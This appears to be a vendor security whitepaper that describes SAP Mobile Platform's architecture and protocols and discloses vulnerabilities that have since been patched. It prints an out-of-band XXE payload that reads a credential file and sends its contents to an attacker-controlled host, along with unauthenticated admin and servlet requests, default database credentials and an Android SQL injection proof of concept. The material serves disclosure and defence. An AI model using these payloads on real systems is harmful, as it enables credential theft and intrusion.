SAP Mobile Platform - ERPScan · 1.2.3. SAP Solution Manager / Change and Transport System (CTS) SAP Solution Manager is the standard platform for Application Lifecycle Management

www.erpscan.com

Dmitry ChastukhinVahagn Vardanyan

www.erpscan.com

SAP Mobile Platform Security

2 SAP Mobile Platform Security 2016

DisclaimerAccording to the partnership agreement between ERPScan and SAP, our company is not entitled to publish any specific and detailed information about detected vulnerabilities before SAP releases an appropriate patch. This whitepaper will only include the details of those vulnerabilities that we have the right to publish as of the release date. However, you can see additional examples of exploitation, which prove the existence of the vulnerabilities by following us during the conferences as well as at ERPScan.com [1].

The research was conducted by ERPScan as a part of contribution to the EAS-SEC non-profit organiza-tion that is focused on Enterprise Application Security awareness.

This document or any of its fragments cannot be reproduced in whole or partially without prior written consent of EAS-SEC. SAP SE is neither the author nor the publisher of this whitepaper and is not responsible for its content. EAS-SEC and ERPScan are not responsible for any damage that can be incurred by attempting to test the vulnerabilities described in this document. This publication con-tains references to SAP SE products. SAP NetWeaver and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP SE in Germany.

Our SAP security surveys go beyond this whitepaper. You can find the latest statistics reports related to SAP services on the Internet and other endeavors of the ERPScan Research on ERPScan’s blog [2] and on EAS-SEC project’s website [3].

2

3SAP Mobile Platform Security 2016 3

CONTENTS1. INTRODUCTION .....................................................................................................................................................4

1.1. What is the client platform supported by SMP/SUP? ...........................................................................41.2. Architecture ..................................................................................................................................................41.2.1. Devices .......................................................................................................................................................51.2.2. Management Console (Sybase Control Center, SSC) ........................................................................51.2.3. SAP Solution Manager / Change and Transport System (CTS) .......................................................51.2.4. SAP Mobile Workspace / Agentry Editor / other development .......................................................61.2.5. SAP Mobile Platform 2.3 .........................................................................................................................61.2.5.1. Mobile Business Objects......................................................................................................................61.2.5.2. Hybrid Web Container ..........................................................................................................................61.2.5.3. OData interface......................................................................................................................................71.2.5.4. Agentry / Agentry applications...........................................................................................................7

2. SAP Mobile Platform protocols ........................................................................................................................82.1. SMP Messaging ............................................................................................................................................82.2. SMP Replication ..........................................................................................................................................92.3. HTTP Rest API ..............................................................................................................................................92.4. SAP Agentry ..................................................................................................................................................92.5. SMP services .............................................................................................................................................. 102.6. SAP Control Center 3.2.7 ......................................................................................................................... 102.7. SAP Mobile Platform CacheDB and SAP Mobile Platform SampleDB ........................................... 112.8.1. mlsrv16.exe – MobiLink ........................................................................................................................ 112.8.3. OBMO.exe ............................................................................................................................................... 13

3. SAP Mobile Platform vulnerabilities ............................................................................................................ 143.1. Decrypting the SAP Mobile Platform GIOP protocol ......................................................................... 143.2. XXE in the SAP Mobile Platform portal page ....................................................................................... 153.3. SAP Mobile Platform unauthenticated access to servlets ............................................................... 20Deploy packet................................................................................................................................................... 21Read logs ........................................................................................................................................................... 21Upload files ....................................................................................................................................................... 22Check deployment packet ............................................................................................................................. 224. SAP Sybase SQL Anywhere ........................................................................................................................ 23

5. SAP Mobile applications .................................................................................................................................. 285.1. 4 interesting facts about SAP applications for Android .................................................................... 285.2. SAP EMR Unwired SQL injection ........................................................................................................... 31Injection in Projection: ................................................................................................................................... 31Injection in Selection: ..................................................................................................................................... 32PoC: .................................................................................................................................................................... 32

Conclusion ............................................................................................................................................................... 33

References ................................................................................................................................................................ 34

About ERPScan ....................................................................................................................................................... 35

About ERPScan Research Team ......................................................................................................................... 36

Our Contacts ............................................................................................................................................................ 37


1. INTRODUCTIONMobile devices are being integrated into business processes increasingly. Despite the BYOD policy is beneficial, “mobilization” of enterprises inevitably entails problems associated with integration and security as there are a lot of business systems and a heterogeneous fleet of devices.

SAP Mobile Platform (formerly Sybase Unwired Platform) is a MEAP (Mobile Enterprise Application Platform) solution. We will further refer to SAP Mobile Platform and Sybase Unwired Platform as SMP and SUP.

SMP/SUP helps companies to resolve the following tasks:

• Integration – in development and deployment, this platform enables connections between dispa-

rate data sources and business systems, with the possibility of caching data for fast delivery.

• Development – the platform includes tools for rapid development of client applications for various

platforms.

• Monitoring – SAP Control Center, included in the platform, allows controlling deployed applica-

tions, server environment, security access, and data transmission.

• Providing data – platform capabilities allow working with data in mobile applications both online

and offline. Data is accessible for all modern mobile devices.

1.1. What is the client platform supported by SMP/SUP?The server part of the system is available for Windows and Linux. Client applications, i. e. programs installed on smartphones, can be written in Objective-C for iOS, Java for Android and Blackberry, and C# for .NET Framework languages. For developing programs, there is SAP Mobile SDK where you can write an application and compile it for the desired platform.

1.2. ArchitectureThe figure below shows the general scheme of SMP. As you can see, SMP is a link between devices and business data. Let’s look at each element separately.

5SAP Mobile Platform Security 2016

Figure 1

1.2.1. Devices

Android, Blackberry, iPhone/iPad and Windows/Windows Mobile devices are end users. Installed client applications are connected to SMP. These programs can be found on Play Market, Apple Store, or Windows Store. SAP Afaria is a non-obligatory MDM solution. HTTP/HTTPS protocols are used to connect to SMP. Before sending data, it is encapsulated using the tm or tm2 protocol.

1.2.2. Management Console (Sybase Control Center, SSC)

It is a portal used by administrators to control the SMP platform. The portal server hosts the sccser-vice.exe process. It listens to the ports 8282 and 8283 via HTTPS.

1.2.3. SAP Solution Manager / Change and Transport System (CTS)

SAP Solution Manager is the standard platform for Application Lifecycle Management (ALM). It plays a decisive role within the ALM tools. Besides providing SAP functionality itself, SAP Solution Manager integrates the other tools to ensure a comprehensive approach. It enables the central access to all required functions and central availability of all required information.

Change and Transport System (CTS) is a tool that helps you to organize development projects in ABAP Workbench and in Customizing, and then transport the changes between the SAP systems in your system landscape. As well as ABAP objects, you can also transport Java objects (J2EE, JEE) and SAP-specific non-ABAP technologies (such as Web Dynpro Java or SAP NetWeaver Portal) in your landscape.


1.2.4. SAP Mobile Workspace / Agentry Editor / other development

These are standard plug-ins, developer tools, and development IDE for programming smartphone applications for SMP.

1.2.5. SAP Mobile Platform 2.3

Let us now consider the structure of the platform at the level of SMP supported applications.

1.2.5.1. Mobile Business Objects

Mobile Business Objects help to form business logic for mobile applications.

A mobile business object (MBO) is derived from a data source (such as a database server, web service, or SAP server). MBOs are deployed to Unwired Server and accessed from mobile device application clients.

MBOs include:

• Implementation-level details – metadata columns that contain information about the data from a data source.

• Abstract-level details – attributes that correspond to instance-level properties of a programmable object in the mobile client and map to data source output columns. Parameters correspond to synchronization parameters on the mobile client, and map to data source arguments. For exam-ple, output of an SQL SELECT query is mapped as attributes, and the arguments in the WHERE clause are mapped as synchronization parameters, so that the client can pass input to the query. MBO operations include parameters that map to data source input arguments. Operation parame-ters determine information a client passes to the enterprise information system (EIS).

• Relationships defined between MBOs by linking attributes and parameters in one MBO to attri-butes and parameters in another MBO.

Applications for smartphones can be downloaded on Google Play and iTunes:

https://play.google.com/store/apps/details?id=com.sap.mobi

https://itunes.apple.com/ru/app/sap-businessobjects-mobile/id441208302?mt=8

1.2.5.2. Hybrid Web Container

Hybrid Web Container is the runtime on the device within which Mobile Workflows are executed.

The Hybrid Web Container is a native application that embeds a browser, which allows you to build applications with the simplicity of web development but utilize the power of native device services. The Hybrid Web Container enables the rapid development of mobile workflows, in which you can extend existing enterprise business processes to a mobile device so that business process decisions can be made on a mobile device.

https://play.google.com/store/apps/details?id=com.sap.mobi

https://itunes.apple.com/ru/app/sap-businessobjects-mobile/id441208302?mt=8


1.2.5.3. OData interface

This interface is necessary for applications to interact with a server that uses OData.

1.2.5.4. Agentry / Agentry applications

A new development archetype for Agentry applications is integrated with SAP Mobile Platform. Devel-opers use the Agentry Editor to create and modify applications, and then deploy to SAP Mobile Server. System administrators install, manage, and monitor applications using SAP Control Center.

Agentry applications provide the ability to:

• Support one or more client device types, and one or more enterprise information systems (EISs) of

varying types, from a single application project.

• Configure and modify applications with minimal user impact.

• Develop simple or complex multi-screen workflows.

• Store high data volumes on client devices.

Each Agentry application has its own Agentry Server instance that runs on a SAP Mobile Server node.


2. SAP MOBILE PLATFORM PROTOCOLSConsidering the security of the SMP platform, let’s start with the analysis of protocols that are used for interactions between mobile applications and the SMP server.

Table 1

SUP 2.1.3 SUP 2.2 SMP 2.3 SMP 3.0

SMP Messaging x x x x

SMP Replication x x x x

HTTP Rest API x x x

SAP Agentry x x

Figure 2

2.1. SMP MessagingSMP Messaging is always compressed and encrypted.

Protocol:

• HTTP encapsulated (HTTPS is optional)

• Compressed & encrypted binary protocol

Encryption:

• 1024 bit asynchronous encryption

− 1024 bit RSA public key exchange


− 128 bit AES synchronous encryption (payload)

− Data traffic (payload) encryption from SMP client to SMP server

− Synchronous keys are automatically renewed during a synchronization session

2.2. SMP ReplicationReplication traffic is encrypted with AES by default (SMP 2.1.3+).

• RSA for key exchange, 128 bit AES transport encryption (configurable in SCC).

• RSA public key is transported to SMP client via SMP Messaging.

• Traffic is HTTP with a binary payload, HTTPS encapsulation is optional.

• Devices need to be registered (via SMP Messaging) before data replication can take place.

• SMP installs with default RSA keys – you MUST change them!

2.3. HTTP Rest APIThe HTTP REST API is using regular HTTPS (SSL) for traffic encryption.

• REST API is a server side only API, no client side SMP-specific modules.

• HTTPS security level (SSL version) depends on the SSL endpoint and the client implementation.

• SSL for REST API traffic is often terminated on a customer’s reverse proxy or the SMP Relay Server.

2.4. SAP AgentrySAP Agentry traffic can be encrypted with SSL.

• The Agentry server is either stand-alone or part of SMP (v. 2.3 and higher) depending on the SMP

version.

• The Agentry traffic protocol is called ANGEL, and is custom TCP binary traffic.

4 services running during normal business hours are installed on SMP servers.


2.5. SMP servicesAfter installation and configuration of the standard SMP server, 4 services are installed:

• SAP Control Center 3.2.7

• SAP Mobile Platform CacheDB

• SAP Mobile Platform SampleDB

• SAP Mobile Server

A brief overview of what they do and why they are needed is below.

2.6. SAP Control Center 3.2.7This service starts sccservice.exe for administrative functions. It listens to the following ports:

• 2100 – RMI port is used for connection. The administrator can connect to this port to do, for

example, the following:

− Delete a package from the server

− Deploy a package to the server

− Export SUP objects from the server

− Import a SUP archive file to the server

You can also call a remote instance RMI method to gain access to other functions, like control logs and system monitoring. SMP servers contain a file sup-admin-client.jar that describes all methods that can be called by RMI.

• 8282/8283 – port for the SMP portal. With the help of this portal, you can manage applications,

connections, and logs.

• 9999 – this port provides administrative RMI connections as the 2100 port.


2.7. SAP Mobile Platform CacheDB and SAP Mobile Platform SampleDBIt starts the SQL Anywhere database. The database listens to the port 5200. The standard account to connect to the database is dba:sql. The complete connection string looks like this:

UID=dba;PWD=sql;Server=mobila23_primary; DBN = demo; ASTART =No;host=mobila23:5200

– where DBN is the database name, Server is the SQL Anywhere server name.

2.8. SAP Mobile ServerThis service starts the following tree service:

Figure 3

During our research, three active processes attracted our attention: mlsrv16.exe, OBMO.exe, and AdminWebServices.exe. Let’s see what they do and what their role in SMP is.

2.8.1. mlsrv16.exe – MobiLink

MobiLink is a session-based synchronization technology designed to synchronize UltraLite and SQL Anywhere remote databases with a consolidated database. Synchronization can occur over TCP/IP, HTTP, or HTTPS.

Figure 4


MobiLink allows choosing selected portions of the data for synchronization. MobiLink synchronization also allows you to resolve conflicts between changes made in different databases. The synchroni-zation process is controlled by synchronization logic, which can be written as an SQL, Java, or .NET application. Each piece of logic is called a script. With scripts, for example, you can specify how uploaded data is applied to the consolidated database, what gets downloaded, and handle different schema and names between the consolidated and remote databases. Event-based scripting provides great flexibility in the design of the synchronization process, including such features as conflict resolu-tion, error reporting, and user authentication.

All changes can be uploaded in a single transaction and downloaded in a single transaction. At the end of each successful synchronization, the consolidated and remote databases are consistent. To preserve the order of transactions, you can also choose to have each transaction on the remote database uploaded as a separate transaction. Either a whole transaction is synchronized or none of it is synchronized. This ensures transactional integrity for each database.

Figure 5

The Mlsrv16.exe process listens to ports 2000 and 5001. During initialization, the initial connection is established. For further data transmission and processing, the mobile application will connect to this port and use the SMP Messaging protocol.

2.8.2. AdminWebServices.exe

This process serves as an administrative service that listens to the local port 5100. Cassini Web Server 1.0 is used as the web server. This service enables performing administrative functions locally without any authentication by sending only one request. For example, the following post request will create an administrator in the SMP:

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded

Content-Length: length

strUserName=string&strActivationCode=string&iExpirationHours=string


2.8.3. OBMO.exe

Data from SQL Anywhere is received through the port 5001 and first processed by the OBMO.exe process that listens on port 5011. If everything is correct, OBMO.exe makes a request to the database, the response is forwarded to mlsrv16.exe and then transmitted to the mobile device. The OBMO.exe application is written in .NET.


3. SAP MOBILE PLATFORM VULNERABILITIESAfter a brief introduction, let us see what kind of vulnerabilities were identified.

3.1. Decrypting the SAP Mobile Platform GIOP protocolWe’ve already talked about mlsrv16.exe – the MobiLink server that is used primarily for data synchro-nization. It uses the port 2000 that interacts with RMI methods, access to which is based on login and password. Let us analyze the traffic of this port. Enable Wireshark on the server and start listening to the port 2000. We can see that the data transfer protocol is GIOP. Also, the USER and PASS fields can be seen in the request body.

Figure 6


After some examination, we were able to find the functions that are used to encrypt and decrypt data accounts. After analyzing the decryption and encryption functions, we wrote a simple script that converts binary login or passes data into decrypted data.

Figure 7

Thus, we were able to decipher personal data transmitted via the GIOP protocol.

3.2. XXE in the SAP Mobile Platform portal pageThe SMP portal is located at https://IP_ADDR:8283/scc, which is an application for Adobe Flash Player. All data is transferred via the AMF protocol. Obviously, to find a vulnerability in the portal, we had to decompile main.swf, which is available at https://IP_ADDR:8283/scc/main.swf. It’s a bit difficult, so we went another way.

Let us look at the server’s web.xml file that describes all available services.

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jet-ty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

This file has a record:

<servlet-mapping>

<servlet-name>MessageBrokerServlet</servlet-name>

<url-pattern>/messagebroker/*</url-pattern>

</servlet-mapping>

You can see that the servlet MessageBrokerServlet is available without authentication.

Also, there is a file:

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jet-ty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

– which describes the paths to some servlets:

<channel-definition id=”scc-polling-amf” class=”mx.messaging.chan-nels.AMFChannel”>


<endpoint url=”http://{server.name}:{server.port}/scc/message-broker/amfpolling” class=”com.sybase.scc.remoting.SccAMFEndpoint” />

<properties>

<polling-enabled>true</polling-enabled>

<polling-interval-seconds>4</polling-interval-seconds>

</properties>

</channel-definition>

<channel-definition id=”scc-secure-polling-amf” class=”mx.messaging.channels.AMFChannel”>

<endpoint url=”https://{server.name}:{server.port}/scc/message-broker/amfsecurepolling” class=”com.sybase.scc.remoting.SccSecureAM-FEndpoint” />

<properties>


<polling-interval-seconds>4</polling-interval-seconds>

<flex-client-outbound-queue-processor class=”com.sybase.scc.messaging.ManagedOutboundQueueProcessor” />

</properties>


<channel-definition id=”scc-http” class=”mx.messaging.channels.HTTP-Channel”>

<endpoint url=”http://{server.name}:{server.port}/scc/message-broker/http” class=”flex.messaging.endpoints.HTTPEndpoint” />


<channel-definition id=”scc-secure-http” class=”mx.messaging.chan-nels.SecureHTTPChannel”>

<endpoint url=”https://{server.name}:{server.port}/scc/message-broker/httpsecure” class=”flex.messaging.endpoints.SecureHTTPEnd-point” />

<properties>

<add-no-cache-headers>false</add-no-cache-headers>

</properties>



<channel-definition id=”scc-long-polling-amf” class=”mx.messaging.channels.AMFChannel”>

<endpoint url=”http://{server.name}:{server.port}/scc/message-broker/amflongpolling” class=”com.sybase.scc.remoting.SccAMFEndpoint” />

<properties>


<wait-interval-millis>-1</wait-interval-millis>

<polling-interval-millis>100</polling-interval-millis>

<max-waiting-poll-requests>50</max-waiting-poll-requests>

</properties>


When we followed these links, no errors were displayed. In response, we got blank pages or, in the case of https://IP_ADDR:8283/scc/messagebroker/http, this:

<amfx ver=”3”>

<body targetURI=”” responseURI=””>

<null/>

</body>

</amfx>

Why don’t we attempt an XXE attack? Send the following request:

POST /scc/messagebroker/http HTTP/1.1

Host: IP_ADDR:8283

<?xml version=”1.0” encoding=”UTF-8”?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM “http://attacker_ip/malicious.xml”>

%remote;]>

<root/>


Our XXE vulnerability has worked. The following servlets are vulnerable:

/scc/messagebroker/amfpolling

/scc/messagebroker/amfsecurepolling

/scc/messagebroker/http

/scc/messagebroker/httpsecure

/scc/messagebroker/amflongpolling

The vulnerable XML parser itself is available at:

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jet-ty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\lib\flex-messaging-core.jar

The package that parsed XML is the flex.messaging.util package.

By exploiting this vulnerability, an attacker can read files on the server or execute a DoS attack if they send an XML bomb.

Notably, there are files that store passwords in plain text. Here is the list of these files:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties

C:\SAP\MobilePlatform\Servers\AgentryServer\Agentry.ini

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\supbackup.properties

Let us try to use XXE to read this file content:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties

To carry out this attack, we need to send to the vulnerable XML parser (/scc/messagebroker/http) the following POST request:

POST /scc/messagebroker/http HTTP/1.1

Host: 172.16.30.6:8283

Content-Length: 142

<?xml version=”1.0” encoding=”UTF-8”?>


<!DOCTYPE root [

<!ENTITY % remote SYSTEM “http://172.16.2.67:8088/payload.xml”>

%remote;]>

<root/>

The SAP server, which received a POST request above, tries to read the file payload.xml from the server http://172.16.2.67:8088.

<!ENTITY % payload SYSTEM “file:///C:\SAP\MobilePlatform\Servers\Un-wiredServer\Repository\Package\sup\sms\gateway.properties”>

<!ENTITY % param1 ‘<!ENTITY % external SYSTEM “http://172.16.2.67:4444?%payload;” >’ >%param1;%external;

When the XML parser processes the payload.xml file, the SMP server will read the file C:\SAP\Mobile-Platform\Servers\UnwiredServer\Repository\Package\sup\sms\gateway.properties, which contains the username and password from the account admin@system. Then, all data will be transferred to http://172.16.2.67:4444.

Figure 8

Let us read the content of this file using XXE:

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

Figure 9


Note the record sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb 6df0ccc79231bc3d. This record is very similar to the encrypted message, which is transmitted through the GIOP protocol (except for the first 2 bytes).

Figure 10

Now we have the password for the admin@system account.

ERPScan researchers talked at length about web.xml attacks at Black Hat USA 2011. The full report is available on our website.

A few words about SMP 3.0. There are also files, which store passwords in plain text. And most impor-tantly, they are not just any test passwords, but passwords from the Keystore.

Figure 11

This vulnerability is fixed by the SAP Security Note 2125358.

3.3. SAP Mobile Platform unauthenticated access to servletsThe SMP server has several web.xml files that describe a number of administrative services/servlets. They have the same anonymous access. These services / servlets allow any user to read and create logs and reports, deploy and install JAR packages.

The vulnerability occurred because of the rights were assigned incorrectly, so an attacker has access to SysAdminWebTool servlet.

For example

POST /sysadminwebtool/jarpkg HTTP/1.1

Host: 172.16.30.6:8283

Content-type: application/x-www-form-urlencoded

value=BASE_64_PACKET


An attacker could:

Deploy packet

POST /sysadminwebtool/jarpkg HTTP/1.1

Host: 172.16.30.6:8283

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

Accept: text/html,application/xhtml+xml,application/xm-l;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive



Read logs

POST /sysadminwebtool/pull HTTP/1.1

Host: 172.16.30.6:8283



Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3




value=sup1494659006494619241.domainlog


Upload files

POST /sysadminwebtool/push HTTP/1.1

Host: 172.16.30.6:8283



Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3



Content-Type: multipart/form-data; bound-ary=---------------------------239992220524277

-----------------------------239992220524277

Content-Disposition: form-data; name=”adminRequest”; filelename=”-filelename”

file_content=

-----------------------------239992220524277--

Check deployment packet

POST /sysadminwebtool/wfhandle HTTP/1.1Host: 172.16.30.6:8283



Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=1tszneqypgst21x9h59bd6pad1




The vulnerability was closed by SAP Security Note 2227855.


4. SAP Sybase SQL AnywhereThe SAP Mobile Platform 2.3 database is SAP Sybase SQL Anywhere, or just SQL Anywhere, version 16. The database was renamed to SQL Anywhere in 2006, when version 10 was released. Today, version 10 or higher is used everywhere.

If you look at the statistics of found security issues in Sybase products at http://www.cvedetails.com/product-list/vendor_id-430/Sybase.html, you can see that the only vulnerability found in SQL Any-where dates back to 2008 and is a buffer overflow. We decided to find out what the vulnerability was.

The vulnerability has the code CVE-2008-0912. It was discovered by a researcher named Luigi Auriem-ma. Here is Luigi’s description of the vulnerability:

“The Mobilink server is affected by a heap overflow which happens during the handling of some strings like username, version and remote ID (all pre-auth) when have a length major than 128 bytes.”

The full description of CVE-2008-0912 is available here.

Encouraged by this vulnerability, we decided to begin our study of the product. We downloaded and installed 2 versions of SQL Anywhere: 11 and 16.

After installation, we are invited to run the SQL server that will listen to any local port that can connect to another host. A demo database is provided together with the DBMS, if it is the developer’s edition. The demo is located at C:\%User%\Public\Documents\SQL Anywhere%version%\Samples\demo.db. Default username and password: dba:sql. After starting the server pro-cess, dbsrv%version%.exe is started. It listens to the port 2638, 3638, or 5200.

Sybase Central, which is installed together with the database, is used to connect to the database. Run Sybase Central and try to connect to a running database that resides on the server 172.16.30.6 and listens to the port 5200.

Figure 12

http://www.cvedetails.com/

http://www.securityfocus.com/archive/1/archive/1/488409/100/0/threaded


Run Wireshark in parallel to the host. Figure 13

After the client (172.16.2.67) successfully connected to the server (172.16.30.6), we stopped Wireshark and analyzed the requests. We are interested in the first PSH request (number 1699).

Figure 14

The data is obviously transferred via the TDS protocol.

0000000-00 1b 00 00 50 00 00 00 00 12 43 4f 4e 4e 45 43 54 . . . P . . . . . CONNECT

0000000-a0 49 4f 4e 4c 45 53 53 5f 54 44 53 00 00 00 01 00 IONLESS_TDS . . . . .

0000000-b0 00 04 00 05 00 06 00 00 01 02 00 00 03 01 01 04 . . . . . . . . . . . . . . . .

0000000-c0 08 00 00 00 00 00 00 00 00 07 02 04 b1 08 11 6d . . . . . . . . . . . . . . . m

0000000-d0 6f 62 69 6c 61 32 33 5f 70 72 69 6d 61 72 79 00 obila23_primary .

We have analyzed the transmitted protocol. The first 8 bytes indicate that we are using SQL Anywhere 16.


Figure 15

The following 19 bytes mean that we are using the TDS protocol. Figure 16

We still did not know the type of data. But we understood one thing: login and password are sent in the following query. In the future, we will try to understand where and how they are transmitted.

Figure 17

The last 18 bytes indicate the name of the SQL server to which the connection will be created.


Figure 18

In the response, we obtain:Figure 19

– which tells us the connection is established.

First, we tried to decompile the files that are used to interconnect the client and the server, but it would take a lot of time. We used a shorter way: fuzzing. We took the first request to connect to the database (1699). After 1 minute of fuzzing our database, SQL Anywhere 16 crashed. After analyzing all the requests that were sent to the server, we found out that the database was down. Here is the query (PoC):

Figure 20


Send this PoC to the 5200 and 5500 ports:

Figure 21

– and look at the service manager:Figure 22

The database services were turned off. The logs gave us the error and the stack dump of SQL Any-where.

Figure 23

This vulnerability is fixed by the SAP Security Note 2108161.


5. SAP MOBILE APPLICATIONSDuring our security analysis of SAP mobile applications, we found out very interesting details.

We only analyzed Android-based mobile applications. Google Play Market has about 46 applications for SAP developed by SAP SE: https://play.google.com/store/apps/developer?id=SAP+SE. Unfortu-nately, we did not have time to analyze all of them.

5.1. 4 interesting facts about SAP applications for Android1. Android applications use shared code. When writing different programs, developers often use the

same library or identical code parts. This method certainly has an advantage because it saves development time, but if one application has a vulnerability, it is highly likely that this vulnerability will be exposed in other applications.

2. Due to human error, sensitive data is often stored in plain text in the folder /data/data/APP_NAME/shared_prefs. This, in our opinion, happens because idle programmers want to easily record and read information from the file rather than the database. Applications that we examined do not store user data in this folder.

3. KeyStore. We have not yet fully analyzed how KeyStore works in SAP programs for Android, but it’s pretty amazing. In the new versions of applications, there is protection against unauthorized access. Before a program works, the Android application asks for a password to access the main functions of the program. All data stored in KeyStore is encrypted using this key. There is another encryption feature that we still haven’t completely understood: the data encryption key. To some extent, it depends on the data entered by the user.

Figure 24


4. Database. Databases in SAP applications store all critical data. And all data is encrypted with a key that the user enters. The encryption algorithm is AES or RSA.

5. Let’s look at the application Hybrid Web Container for Android. The SMP Messaging protocol was already mentioned above. During initialization of the application (Hybrid Web Container at 172.16.2.17) to the server (172.16.30.6), it sends connection requests which look like this:

Figure 25

Show Follow TCP Stream in Wireshark:Figure 26

As you can see, it’s an HTTP POST request, and the body is binary data. First, the binary data is com-pressed by the gzip algorithm, then encrypted and sent to the server. supAdmin here is the user of the application on the server. Connection string:

xtm://mo/rmi?cid=HWC&devid=4659daa3-c047-37bd-9a24-a5e579788e09__HWC&devtype=android&connid=2&valcode=555555&noauth=true

– where HWC is the Farm ID, 555555 is the Activation code, devid is the code generated automatically on the smartphone. All data is initialized in the application. During the connection, you can connect via the HTTPS protocol.


Figure 27

Let’s see how the POST body is encrypted.

The encryption key is selected by the following algorithm.1. The app looks in its local database for any clues that can encrypt data. The keys are stored in the

database ServerKeysDB, which is available at /data/data/com.sybase.hwc/databases/.

1.1. If the keys are there, data is encrypted with this key and sent to the server.

1.2. If the key is not in the local database, go to step 2.

package com.sybase.messaging.traveler;

************

private OutputStream startTmMessage(...)

throws TmException

{

************

RSAPublicKey localRSAPublicKey = this.m_oServerKeys.m_oServerPub-licKey;

i = 0; if (localRSAPublicKey != null) break label732; getKeysFromServer();

************

}


2. The application sends a request to the server to provide encryption keys.

2.1. If the server responds positively, sends the keys to the client, the application imports the key to the local database (ServerKeysDB), and data is encrypted encrypted with this key and sent to the server.

2.2. If the server responds negatively, go to step 3.

3. Android application generates its own keys, stores them in a local database, encrypts the message with them, and sends the data to the server.

********

arrayOfByte1 = Cryptographer.generateNewSymmetricKey();

arrayOfByte2 = Cryptographer.generateNewSymmetricKey();

********

5.2. SAP EMR Unwired SQL injectionERPScan researcher discovered an SQL injection vulnerability in the SAP EMR Unwired application (com.sap.mobi). Malware can execute SQL queries in the SAP EMR Unwired database.

In order to carry out the attack, malicious applications must have the following rights in AndroidMani-fest.xml:

<provider android:name=”.providers.ModiDataDbProvider” android:au-thorities=”com.sap.mobi.docsprovider” />

Injection in Projection:

content://com.sap.mobi.docsprovider/documents/offline_cat

content://com.sap.mobi.docsprovider/documents/offline/

content://com.sap.mobi.docsprovider/documents/sample

content://com.sap.mobi.docsprovider/documents/online

content://com.sap.mobi.docsprovider/documents/offline_auth

content://com.sap.mobi.docsprovider/documents/offline

content://com.sap.mobi.docsprovider/documents/online_auth

content://com.sap.mobi.docsprovider/documents/sample/

content://com.sap.mobi.docsprovider/documents/online_cat


Injection in Selection:

content://com.sap.mobi.docsprovider/documents/offline_cat

content://com.sap.mobi.docsprovider/documents/offline/

content://com.sap.mobi.docsprovider/documents/sample

content://com.sap.mobi.docsprovider/documents/online

content://com.sap.mobi.docsprovider/documents/offline_auth

content://com.sap.mobi.docsprovider/documents/offline

content://com.sap.mobi.docsprovider/documents/online_auth

content://com.sap.mobi.docsprovider/documents/sample/

content://com.sap.mobi.docsprovider/documents/online_cat

PoC:

Uri: content://com.sap.mobi.docsprovider/documents/sample

Projection: = name from sqlite_master --

This vulnerability is patched by SAP Note 1864518.

More details here: http://erpscan.com/advisories/erpscan-13-024-sap-emr-unwired-multiple-sql-injec-tions/

http://erpscan.com/advisories/erpscan-13-024-sap-emr-unwired-multiple-sql-injections/

http://erpscan.com/advisories/erpscan-13-024-sap-emr-unwired-multiple-sql-injections/


CONCLUSION Beyond doubt, new features simplify business processes and improve performance. However, when implementing new a cutting-edge solution, one should not forget that they may be another entry point for hackers.

The general rule is rather predictable; install appropriate security patches on the regular basis.


REFERENCES“ERPScan – strategic SAP AG partner in security,” [Online]. Available: http://erpscan.com/.

“ERPScan blog,” [Online]. Available: https://erpscan.com/category/press-center/blog/.

“EAS-SEC Enterprise Application Security Project,” [Online]. Available: http://eas-sec.org/.

http://erpscan.com

https://erpscan.com/category/press-center/blog

http://eas-sec.org


ABOUT ERPSCAN ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally. Named as an ‘Emerging vendor’ in Security by CRN and distinguished by more than 35 other awards - ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf supporting in improving security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure ERP systems and business-critical applications from both, cyber-at-tacks as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innova-tive software is the only solution in the market certified by SAP SE covering all tiers of SAP security i.e. vulnerability assessment, source code review and Segregation of Duties. The largest companies from across diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Monitoring Suite for SAP is specifically designed for enterprise systems to continuously monitor changes in multiple SAP systems. It generates and analyzes trends on user friendly dashboards, manages risks, tasks and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.

We use ‘follow the sun’ principle and function in two hubs, located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time while providing an agile customer support.


